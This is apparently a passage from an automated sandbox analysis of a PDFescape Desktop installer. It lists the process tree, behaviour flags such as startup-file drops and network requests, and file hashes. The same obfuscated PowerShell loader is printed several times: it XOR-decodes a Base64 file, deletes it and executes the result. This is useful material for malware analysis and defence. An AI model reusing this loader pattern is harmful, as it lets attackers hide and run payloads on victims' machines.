C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{2BC47158-F746-4E22-B116-D481B09E9674}1⤵
- Loads dropped DLL
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\preview-handler.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\thumbnail-handler.dll"2⤵
- Loads dropped DLL
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\context-menu.dll"2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exe"C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dll"2⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Program Files\PDFescape Desktop\ws.exe"C:\Program Files\PDFescape Desktop\ws.exe" -service2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 9E8863CFD48A74FEE4783E820437DD15 E Global\MSI00002⤵
- Loads dropped DLL
-
C:\Program Files\PDFescape Desktop\updater-ws.exe"C:\Program Files\PDFescape Desktop\updater-ws.exe" -service2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll"2⤵
- Loads dropped DLL
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll"2⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-word-plugin.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-excel-plugin.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-powerpoint-plugin.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\syswow64\MsiExec.exe"C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll"2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exe"C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll"2⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
-
C:\Program Files\PDFescape Desktop\creator\common\printer-installer-app.exe"C:\Program Files\PDFescape Desktop\creator\common\printer-installer-app.exe" -i "C:\Program Files\PDFescape Desktop\creator\common"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Program Files\PDFescape Desktop\creator\common\creator-app.exe"C:\Program Files\PDFescape Desktop\creator\common\creator-app.exe" -regserver2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe"C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe" -service2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Program Files\PDFescape Desktop\escape.exe"C:\Program Files\PDFescape Desktop\escape.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: AddClipboardFormatListener
-
C:\Program Files\PDFescape Desktop\ws.exe"C:\Program Files\PDFescape Desktop\ws.exe"1⤵
- Executes dropped EXE
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Program Files\PDFescape Desktop\updater-ws.exe"C:\Program Files\PDFescape Desktop\updater-ws.exe"1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dllMD5
a733c1f89219252497e94cbc66272478
SHA1f5f9be9a2345f6dc0414c3b62b4087faa32ce351
SHA256557bb1a545eac9c352dbbe15fbf383d29c6b2640b8cf74e49fefcdee97270547
SHA512875b4958cadbd8901f4fcb6c5c12f24e2112dbd287975134c6f83573d6ce679be0058dc259ab1db31a64dc48470622c80e75555e43a240e63854df859b65e0bd
-
C:\Program Files\PDFescape Desktop\atom.dllMD5
9148f07e6dedce3e8e6a642fba0402d8
SHA12e403f6b65bf4519d0883ebb0025d77130105a1c
SHA25635bd82d881759b2aa8ef6dc6e26d0943a19593b2192d207b4440c6e1a29ba05a
SHA5128f7ab028af2b782df35bf9940a8f367ac49f015d8302242d553e9437882b1fb76ebc91f3dfe2faadd2cde07af260e8ad140e3a59f0f44c05188ebf2bcfe016cb
-
C:\Program Files\PDFescape Desktop\brand.dllMD5
594a3e3adcf139e7b20eddd1f16131d3
SHA17700c89b10e779fc6db72b42be0a81fe89378f9a
SHA25652163973b0cf8d46bcd1fb26c58f8ab2f7b31fb7e2b05ded2b59ae8d4e2332ad
SHA512d1240865fc5bfcd0c17205ce866be49b76ae31fccaaa724859822a6311e0e5bb6df2642b5659c1ad20414d79c6c9abbe74419ad4474fa71cbc4e8cab57d0c7cc
-
C:\Program Files\PDFescape Desktop\context-menu.dllMD5
2c9f26866787b200996d99ad160be2b2
SHA1fec80f5b4a6acf29f74a2bc8918298518a487597
SHA2564e3a2ed474ffdb02b4a177cd748cdb31b63f1f1fe3c32bf64cedfc06b6528a57
SHA5129ade4951f2297ad233bbd41103c8a686a6098cdb2f88ad63eec8742e3bacb85fc02357a58163139259274ed6f3a1299d07b7b7db43bf8eb539c1e0fec018d6dd
-
C:\Program Files\PDFescape Desktop\encoding-conversion.dllMD5
448a6de619faf0f403c897b142f619c5
SHA1e76953f8ee3c207b44d2e7c92eaabd5e6deee4d2
SHA25600a91d382e5e4a04071b208e4717c0f53e7d7146db1ab542f3fb3358f8aa4c51
SHA512f4e450e63a7105796fe78d90731c62804cf2ee5d2ac706525684b5c4eb20552126d1a2393acb5d5b4ee59ca4a4429aab9403510aa7947b2ef6f3eb36cbd3348d
-
C:\Program Files\PDFescape Desktop\libcurl.dllMD5
140cdda2f51d89dc194a8b8c3ab9e463
SHA1255180975a70d00d31d516ecc895e42fd18c24bf
SHA256a30c086bb16c702985df2193d1e52cfb15b978a679de014b449a95eb9a233c15
SHA5125065efa34b3289be247a5bc3f677afae7a86753fc37f816da70d54d1986b6dfe8cc73ad13900020a99fec7de71bd4d23e02bf73fab6be220db1c65482ca860a4
-
C:\Program Files\PDFescape Desktop\libssl-1_1-x64.dllMD5
62dc606e7f85f8f15a582a045e394d19
SHA1bad647ebb9207e2b20d464c6b420c84b971519d2
SHA2567a91d83167c864b5381667370b95fe6081290c61356c90def9a25cf7b3d9c411
SHA512d7e8c1e9abf695db2b1038c5231ccbc3c2cfd89171e4df3d7a13d8979c096772feace7dacbbb347a657e4e5519240813f8953b75c80259cd256245a9ef2f7e8f
-
C:\Program Files\PDFescape Desktop\pdfcore.dllMD5
c10d1adf13c2edde02e6adf49d1c900b
SHA14455fc9f229dedf4dd5622e6675c7a03ac8bd4d6
SHA2566e028640b313e136a28c77245700a5b2a604935fc55f4454888192b685081d44
SHA5120768d3372e652282d3cd0e5fa9e697949d682fa4e3c9ee8d70461588baa07243271129ec5b300c1893820fddaafda12867605c1c5858d57efa9e3fd65ca28fbe
-
C:\Program Files\PDFescape Desktop\pdfgraphics.dllMD5
1fc38631bf08eff07e8466f69ce90a46
SHA13973584e1371dfb26ae31cb4b555c972bd30f5a4
SHA25678c09e4d384f1b3df9e9e00798f5f048b41866af5e0c16b7e463e6bdd695ec89
SHA5125818d9f22cf865c12b08f684cb3cced4f55036f78df36d88cdb2530134f3db3170729b1212598ce6371c67ddd9eb887ff3e1fc551c258ee0ce3bd722529a63db
-
C:\Program Files\PDFescape Desktop\pdfview.dllMD5
40ca796430abed5d369f0781af26481e
SHA149abef703e2c9c70e691d8971505691402c2e745
SHA256e303c331da06258aa0f726ae95dc51f65bb3de88e8fa431a7542e867e208ad19
SHA51238a5be054afaddc28345860f23bb5824d8079b27d97862917a345460de7c131b8fbf41451248cc7efd60596cd5e0202160c9710992bac073b88b2b83074fa5b8
-
C:\Program Files\PDFescape Desktop\preview-handler.dllMD5
0a58eba4b339c0bb6f44a314ee06d7c7
SHA1136b337a2c80fce2e4c0732fe5c821d58aad7d40
SHA25632dbc446d09e062568989bace5cc19772e2dbeccec681dd8f38ef27cf5aab47a
SHA51218d664f0242412a2e0acece5a7a8de5f1be6816b80b5665192bab2d2868e682ef43cd275d8be276ef909663bd11233c972c5f7856a32663f3876ca5a8475ad85
-
C:\Program Files\PDFescape Desktop\root-service-provider.dllMD5
58c639f842629bf97596add29b0ad19c
SHA1059b152148a8fb92f9b8f119fa95608240ea2957
SHA25640b0061cec34d9e7ce84b01a3d30e9d7eb2bcd71b9110b06680767ec7f9da503
SHA512f304dd099df5e63ebea6f87a27b718bf7f1d7b995f77ea9cb0cbcbdc621d999eb5a1eca76b50a6e96a7e5e8d136e050fdcd04b9894743f254665537e35ad473a
-
C:\Program Files\PDFescape Desktop\thumbnail-handler.dllMD5
5c467cd8042003e71597dccb53a03bfb
SHA1134db7349cfc485ee5f32b9583210843e02acdda
SHA2562f6c64fe4b3c69d4f2235a461d74497e37c0eb3fb2432191370c2430848d5c85
SHA512b1782bd052e98cfd026067992180764965fcfec3c9b840512d522f0ed2278920616ac292d6332b9be0b5829c33bcabc4409bc0fceafe17290b1b13cc3a67dd99
-
C:\Program Files\PDFescape Desktop\ws.exeMD5
c86fef0f4c86065fda9368fe5a1043d0
SHA19c858857549675608c933b980d2f74c0ffaaa769
SHA256f88a861823f995c48ddb7afe8f4be90a5d1ea5deff3df0b0c152fa0e5c2f1b65
SHA5124674d73eee0741a8faf992e55214a0471702031d6fc922ee8e141750f385169be773d2610f608ed513764359fe1c1f8ed9d2602ff34b346e88bcaf321015b812
-
C:\Program Files\PDFescape Desktop\ws.exeMD5
c86fef0f4c86065fda9368fe5a1043d0
SHA19c858857549675608c933b980d2f74c0ffaaa769
SHA256f88a861823f995c48ddb7afe8f4be90a5d1ea5deff3df0b0c152fa0e5c2f1b65
SHA5124674d73eee0741a8faf992e55214a0471702031d6fc922ee8e141750f385169be773d2610f608ed513764359fe1c1f8ed9d2602ff34b346e88bcaf321015b812
-
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exeMD5
87d28b3d2df1cab3711bf8d3b5b520c2
SHA11987a4bf2a37f6538c701461357a52b0bce1b980
SHA25688472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA51219226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exeMD5
87d28b3d2df1cab3711bf8d3b5b520c2
SHA11987a4bf2a37f6538c701461357a52b0bce1b980
SHA25688472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA51219226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
C:\ProgramData\PDFescape Desktop\Installation\Statistics.dllMD5
e5a591c125fdf21381cf543ed7706c66
